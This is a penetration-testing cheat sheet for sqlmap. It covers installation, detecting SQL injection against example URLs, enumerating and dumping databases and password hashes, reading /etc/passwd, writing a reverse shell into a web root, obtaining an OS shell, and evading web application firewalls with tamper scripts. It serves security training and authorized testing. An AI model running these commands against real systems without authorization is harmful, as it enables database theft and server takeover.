automated-sql-injection
Automated SQL Injection
Sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It supports a wide range of database management systems (such as MySQL, PostgreSQL, Oracle, and Microsoft SQL Server) and can be used to extract data, access the underlying file system, and even execute system commands in certain cases.
Installation
sudo apt install sqlmap # debian
Basic Usage
sqlmap -u 'http://rezydev.xyz/info.php?user=3' # GET
sqlmap -u "http://cat.local/accept_cat.php" --data "catId=1&catName=cat" -p catName # POST
sqlmap -r request.txt # Using HTTP Request
Automated Injection Techniques
❯ sqlmap -h | grep technique # or -hh for all
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
B: Boolean-based blindE: Error-basedU: Union query-basedS: Stacked queriesT: Time-based blindQ: Inline queries
Enumeration Flags
--banner # Database Version
--fingerprint # Perform an extensive DBMS version fingerprint
--current-user # Name suggests itself
--current-db # Name suggests itself
--is-dba # Verify if current user is database administrator
--dbs # List databases
--tables # List Tables
<strong># Note: '--tables -D db_name' to list tables of specific database
</strong>
--schema # Know structure of the database tables
--dump -T table_name -D db_name # Dump the data
<strong># We can add '-C name,contact' to just list the mentioned columns from 'table_name'.
</strong>
--where="username LIKE 'r%'" # Find username starting with 'r'
<strong># Note: username above is column
</strong>
--search -T users # Search table name 'users'
--search -C username # Search column name 'username'
<strong># Note: It will even find if the column or table name is users_tbl etc...
</strong>
--passwords # Enumerate DBMS users password hashes
<strong># Dump Everything except informations from system databases
</strong>--dump-all --exclude-sysdbs
Interesting Flags
--batch # Skip and keep default user inputs
-H 'Custom-User-Agent' # Set User-Agent
--cookie='COOKIE-HERE' # Set Cookie Here
--proxy=http://localhost:8080 # Use BurpSuite as a Proxy
<strong># In some cases we can define the prefix and suffix ourself too.
</strong>--prefix="'))"
--suffix="-- -"
<strong># If we are Database Administrator (dba)
</strong>--file-read "/etc/passwd"
--file-write "reverse_shell.php" --file-dest "/var/www/html/reverse_shell.php"
--os-shell # Get Shell
--level 1-5 # Extends used vectors and boundaries
--risk 1-3 # The higher the value, the greater the number of payloads injected by sqlmap, but also the greater the risk
WAF/Protection Bypass Flags
--random-agent # Randomize User-Agent
--delay 10 # Add delays per request
--csrf-token="XSRF" # here 'XSRF' is POST-Parameter
--chunked # Use HTTP chunked transfer encoded (POST) requests
--tamper=between,space2comment,etc.. # Use given script(s) for tampering injection data
Tamper Scripts List
<strong>❯ sqlmap --list-tampers
</strong>* 0eunion.py - Replaces instances of <int> UNION with <int>e0UNION
* apostrophemask.py - Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
* apostrophenullencode.py - Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
* appendnullbyte.py - Appends (Access) NULL byte character (%00) at the end of payload
* base64encode.py - Base64-encodes all characters in a given payload
* between.py - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
* binary.py - Injects keyword binary where possible
* bluecoat.py - Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
* chardoubleencode.py - Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
* charencode.py - URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
* charunicodeencode.py - Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
* charunicodeescape.py - Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
* commalesslimit.py - Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
* commalessmid.py - Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
* commentbeforeparentheses.py - Prepends (inline) comment before parentheses (e.g. ( -> /**/()
* concat2concatws.py - Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
* decentities.py - HTML encode in decimal (using code points) all characters (e.g. ' -> &#39;)
* dunion.py - Replaces instances of <int> UNION with <int>DUNION
* equaltolike.py - Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
* equaltorlike.py - Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart
* escapequotes.py - Slash escape single and double quotes (e.g. ' -> \')
* greatest.py - Replaces greater than operator ('>') with 'GREATEST' counterpart
* halfversionedmorekeywords.py - Adds (MySQL) versioned comment before each keyword
* hex2char.py - Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
* hexentities.py - HTML encode in hexadecimal (using code points) all characters (e.g. ' -> &#x31;)
* htmlencode.py - HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)
* if2case.py - Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart
* ifnull2casewhenisnull.py - Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
* ifnull2ifisnull.py - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
* informationschemacomment.py - Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
* least.py - Replaces greater than operator ('>') with 'LEAST' counterpart
* lowercase.py - Replaces each keyword character with lower case value (e.g. SELECT -> select)
* luanginx.py - LUA-Nginx WAFs Bypass (e.g. Cloudflare)
* misunion.py - Replaces instances of UNION with -.1UNION
* modsecurityversioned.py - Embraces complete query with (MySQL) versioned comment
* modsecurityzeroversioned.py - Embraces complete query with (MySQL) zero-versioned comment
* multiplespaces.py - Adds multiple spaces (' ') around SQL keywords
* ord2ascii.py - Replaces ORD() occurences with equivalent ASCII() calls
* overlongutf8.py - Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)
* overlongutf8more.py - Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
* percentage.py - Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)
* plus2concat.py - Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
* plus2fnconcat.py - Replaces plus operator ('+') with (MsSQL) ODBC function `{fn CONCAT()}` counterpart
* randomcase.py - Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
* randomcomments.py - Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)
* schemasplit.py - Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')
* scientific.py - Abuses MySQL scientific notation
* sleep2getlock.py - Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"
* sp_password.py - Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
* space2comment.py - Replaces space character (' ') with comments '/**/'
* space2dash.py - Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
* space2hash.py - Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
* space2morecomment.py - Replaces (MySQL) instances of space character (' ') with comments '/**_**/'
* space2morehash.py - Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
* space2mssqlblank.py - Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
* space2mssqlhash.py - Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
* space2mysqlblank.py - Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
* space2mysqldash.py - Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
* space2plus.py - Replaces space character (' ') with plus ('+')
* space2randomblank.py - Replaces space character (' ') with a random blank character from a valid set of alternate characters
* substring2leftright.py - Replaces PostgreSQL SUBSTRING with LEFT and RIGHT
* symboliclogical.py - Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
* unionalltounion.py - Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
* unmagicquotes.py - Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
* uppercase.py - Replaces each keyword character with upper case value (e.g. select -> SELECT)
* varnish.py - Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall
* versionedkeywords.py - Encloses each non-function keyword with (MySQL) versioned comment
* versionedmorekeywords.py - Encloses each keyword with (MySQL) versioned comment
* xforwardedfor.py - Append a fake HTTP header 'X-Forwarded-For' (and alike)